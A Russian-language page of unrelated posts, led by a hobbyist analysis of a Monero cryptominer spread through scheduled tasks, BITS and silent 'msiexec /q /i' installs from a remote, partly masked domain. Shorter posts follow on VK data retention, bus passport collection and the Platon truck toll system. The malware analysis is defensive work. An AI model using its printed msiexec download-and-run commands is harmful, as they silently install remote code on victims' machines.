Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

В автозагрузке, повторюсь всё в порядке:

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Из поста Кристиан Шинкевич https://www.facebook.com/kris.minsk/posts/480428622415608

Дикая ситуация?

с 25 мая 2018 года в ЕС вышел протокол о защите персональных данных, по которому все жители ЕС могут запросить всю информацию о себе и своих данных что есть у разных организаций которые ими владеют.

Так вот, я у vk.com запросил эту информацию, сегодня получил файл, и это пиздец

Они хранят на меня:

1) Всю историю изменения имени и фамилии на моей странице.

2) какие групы админю/админил.

3) какие файлы загружал в ВК, с какого айпишника, города, а так же даже на удалённые aайлы сылка есть в этом файле, более того, даже простые голосовые сообщения из удаленных переписок там хранятся у них

4) даже все файлы что я удалил со своей страницы, точнее их адрес файлов, название, когда добавил, и с какого айпишника, а так же прямая ссылка по которой они дальше открываются, несмотря на то что я даже удалил эти файлы из своего акканта и переписки, и голосовые сообщения (пример: https://psv4.userapi.com/…/u3197818…/audiomsg/979d03d376.ogg) хранятся дальше, и простые файлы (PDF и тд).

5) Более того, хранятся даже адреса фоток из списка сохраненных фоток (закрытый альбом) (прямые ссылки что они предоставили открываются даже без залогинивания в контакт, например вот: https://pp.userapi.com/c407…/v407724212/39ba/MSTlumrAMvg.jpg)

6) Хранит ВСЮ историю переписок, даже удалённых (у меня Сообщения за период 01.01.2007 00:00:00 - 27.06.2018 20:43:51, но первое отображаемое 01.09.2016 в 21:40:30), со всеми вложениями, даже удалёнными.

7) Вся история привязки-отвязки номера от аккаунта

8 ) История восстановления паролей к странице

9) Все комментарии и посты с моей стены в ВК, даже удаленные год-два назад (пишет пункт так: Сообщения, оставленные на стене пользователя".

Ситуация тут в чём, файл этот весит буквально 1,5мб, но там вся моя активность в ВК с 2016 года (когда запили страничку), и то уверен что они дааалеко не всё мне прислали и у них в разы больше инфы. Проблема тут в общем в том, что это значит, что такой файл спокойно годами брала белорусская милиция, НКВД и тд, и открыто без ведома пользователя читала все переписки, что мои, что сотен других активистов по стране, и не только из Беларуси.

Как по мне, это идеально основание не пользоваться данной соцсетью, подконтрольной ФСБ и банде Путина,

и более того, что согласно закону они должны хранить эту инфу только год, а не бессрочно

*Остальную информацию они отказались мне предоставлять, более того, после этого моего поста в фейсбуке закрыли мне доступ к моей странице в vk, на email не отвечают. На основании чего я подал официальную жалобу в Польское Управление по Защите персональных данных.

Продолжение следует.

Всем привет. Еду сейчас в Рязань. Билеты почему-то теперь надо покупать у водителя. Не знаю разовая ли это акция или теперь всегда так будет. Раньше были билеты с местами, паспортные данные спрашивали в кассе. Раньше и туалет был в автобусе и стюардесса с чаем и кофе и фильмы. Сначала убрали стюардесс, потом закрыли туалеты, теперь и фильмы не показывают, теперь вот билеты не в кассе, а у водителя покупать. Не знаю будет ли сегодня остановка на 10 минут, чтобы все сходили по делам.

Захожу в автобус, билета водитель не дал, денег не взял. Пришлось сесть на свободные места (Напомню, что раньше давали билеты с указанием места). Было бы больше народу, сидели бы с парнем по отдельности. Да  можно было купить билет и через интернет и ввести там свои паспортные данные, оплатить и сесть на своё место указанное в билете, но раньше билеты покупала в кассе без проблем.

Итак, сели, началось движение. Водитель по громкоговорителю говорит всем , впишите свои паспортные данные, чтобы не тратить время. я в шоке. И пошёл листик по рядам. Конечно ничего я заполнять не стала, считаю что водитель сам должен собрать все данные или данные долдны быть собраны под его присмотром, а не поручать это пассажирам. Итог.  Все , кроме меня и парня, вписали свои паспортные данные в листок,  который, при желании, мог сфотографировать каждый следующий пассажир.  я спросила у людей, не стремно ли им, что всё увидят их паспортные данные и потом возьмут на них кредит или впишут их данные как созаёмщика. Всем насрать.

Так и живём.

Почитала 112 постановление о перевозках. Там ничего особого не сказано, как должна собираться и храниться информация.

47. Если в соответствии с законодательством Российской Федерации персональные данные о пассажирах подлежат передаче в автоматизированные централизованные базы персональных данных о пассажирах, регулярные перевозки осуществляются с использованием именных билетов.

Именные билеты оформляются на основании документа, удостоверяющего личность пассажира в соответствии с законодательством Российской Федерации

50. Продажа билетов для проезда в междугородном сообщении производится в кассах автовокзалов, автостанций или иных пунктах продажи билетов, а при отсутствии таких пунктов - водителями или кондукторами непосредственно при посадке пассажиров в транспортное средство до отправления его из остановочного пункта.

Про то каким способом водитель должен собирать информацию, не написано. Но уж точно не поручать это дело пассажирам.

Минтранс хочет обязать владельцев грузовых автомобилей массой свыше 12 тонн менять бортовые устройства системы "Платон" каждые три года. Это следует из документа, размещенного на федеральном портале проектов нормативных правовых актов.

В Минтрансе объясняют, что срок службы таких устройств составляет три года, что связано со сроком действия установленных в них средств криптографической защиты информации, обеспечивающих достоверность и некорректируемость передаваемых данных. Тогда как сведения с бортовых устройств с истекшим сроком службы могут быть недостоверными, отмечают в министерстве.

Минтранс рассчитывает, что законопроект, в случае его принятия, вступит в силу с сентября 2018 года.

Система "Платон" введена в конце 2015 года. Она используется для взимания платы с грузовиков массой свыше 12 тонн за проезд по федеральным трассам. Стоимость тарифа составляет 1,90 рубля за километр. Средства направляются на развитие и поддержание дорожной инфраструктуры.

Ранее в Минтрансе сообщили, что ожидают, что в 2018 году сборы от системы "Платон" составят 20 миллиардов рублей.

Источник:

https://rg.ru/2018/07/24/dalnobojshchikam-predlozhili-meniat...